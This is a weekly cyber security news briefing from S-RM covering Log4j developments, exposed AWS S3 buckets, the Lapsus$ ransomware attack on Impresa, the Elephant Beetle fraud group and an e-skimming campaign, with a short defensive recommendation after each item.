The S-RM Cyber Intelligence Briefing is a weekly round-up of the latest cyber security news, trends, and indicators, curated by our intelligence specialists.
- The Apache Log4j saga continues. Stay up-to-date with four key developments on Log4j.
- There’s a hole in your bucket. SEGA Europe and D.W. Morgan exposed data via unsecured AWS S3 buckets.
- New year, more ransomware. Impresa suffers ransomware attack featuring interesting extortion tactics.
- How to eat an elephant. Threat group Elephant Beetle steals millions over long periods of time.
- E-skimming attack. Over 100 property websites infected with digital skimmers.
1. The Apache Log4j saga continues
Since being publicly disclosed on 10 December 2021, vulnerabilities in the logging software Apache Log4j have had a significant impact worldwide. Here are four key developments to keep you updated:
- Microsoft has warned that malicious actors, including nation state actors, are continuing to carry out a number of attempts to exploit the Log4j vulnerabilities.
- The US Cybersecurity and Infrastructure Security Agency (CISA) released a scanning tool, Log4j-scanner, that aims to identify web services potentially susceptible to Log4j’s remote code execution vulnerabilities.
- A collection of global cyber security agencies has released a joint advisory that includes guidance on identifying assets affected by Log4j vulnerabilities, updating those affected assets, and initiating search procedures to detect possible Log4j exploitation.
- The US Federal Trade Commission has warned that it intends to “use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future”.
SO WHAT? Log4j vulnerabilities continue to pose a serious risk to organisations, but tools are available to help mitigate that risk. Organisations must ensure that they know where, and how, Log4j is employed in their estate, and that the relevant measures to secure Log4j vulnerabilities are implemented swiftly.
2. SEGA Europe and D.W. Morgan expose data through misconfigured AWS S3 Buckets
- SEGA Europe, a video game and entertainment company, reportedly left an Amazon Web Services (AWS) S3 bucket publicly exposed. The unsecured bucket contained sensitive user information and multiple sets of AWS keys that could have been used to access many of the company's cloud services.
- Separately, the supply chain management and logistics giant D.W. Morgan also reportedly exposed sensitive data relating to its clients and various shipments after a publicly exposed and unsecured AWS S3 bucket was discovered online.
There is no indication whether any of the data left exposed by SEGA Europe or D.W. Morgan was accessed by malicious actors.
SO WHAT? Public and private cloud resources should be separated with appropriate security configurations in place. Conduct regular penetration tests to ensure your resources are adequately secured.
3. Impresa suffers ransomware attack featuring interesting pressure tactics
Impresa Group, a Portuguese media company, suffered a ransomware attack by a new ransomware group named Lapsus$. The group targeted Impresa’s critical server infrastructure, which significantly disrupted the company’s operations. While online streaming services are down, Impresa’s radio and TV broadcasting services were unaffected.
Lapsus$ also employed several interesting extortion tactics. They defaced Impresa’s websites with a ransom note, took control of and tweeted from the company’s Twitter account, and sent text messages to Impresa’s customers notifying them of the incident.
SO WHAT? Incident response plans should consider the need to respond to a range of pressure tactics employed by threat actors, and ransomware groups in particular.
4. Elephant Beetle threat group hiding in victim networks to divert transactions
A sophisticated threat group named Elephant Beetle has reportedly compromised numerous organisations and, using over 80 unique tools and scripts, siphoned millions of US dollars from their victims. The group is reportedly patient, spending long periods of time in their victims’ networks before committing their fraud. They typically use many fraudulent transactions to steal small amounts of money over long periods of time.
Elephant Beetle appears to gain access to its victims’ networks by exploiting vulnerabilities in legacy Java applications running on Linux systems.
SO WHAT? Organisations should ensure that software is patched regularly and legacy systems are not accessible from the internet. Include the indicators of compromise for Elephant Beetle in your security programmes.
5. Over 100 PROPERTY websites compromised in e-skimming attack
In a new supply chain attack, cybercriminals injected malicious code into a cloud video platform to install digital skimmers on over 100 property websites. When websites embedded the video player, the e-skimmer was embedded as well. Compromised sites have remediated the issue since the campaign was discovered but it is believed that sensitive data such as names, email addresses, phone numbers, and credit card information may have been stolen by the attackers.
SO WHAT? Administrators should conduct regular code reviews of their websites to monitor for any potential malicious code.